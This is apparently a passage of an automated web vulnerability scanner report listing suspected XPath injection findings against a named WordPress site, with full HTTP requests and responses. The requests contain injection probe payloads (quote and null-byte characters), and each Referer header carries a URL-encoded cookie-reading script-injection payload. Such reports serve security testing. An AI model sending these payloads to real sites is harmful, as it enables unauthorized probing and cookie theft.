Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.25. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.26. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.27. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.28. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.29. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.30. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.31. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.32. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.33. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.34. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.35. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.36. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.37. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.38. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
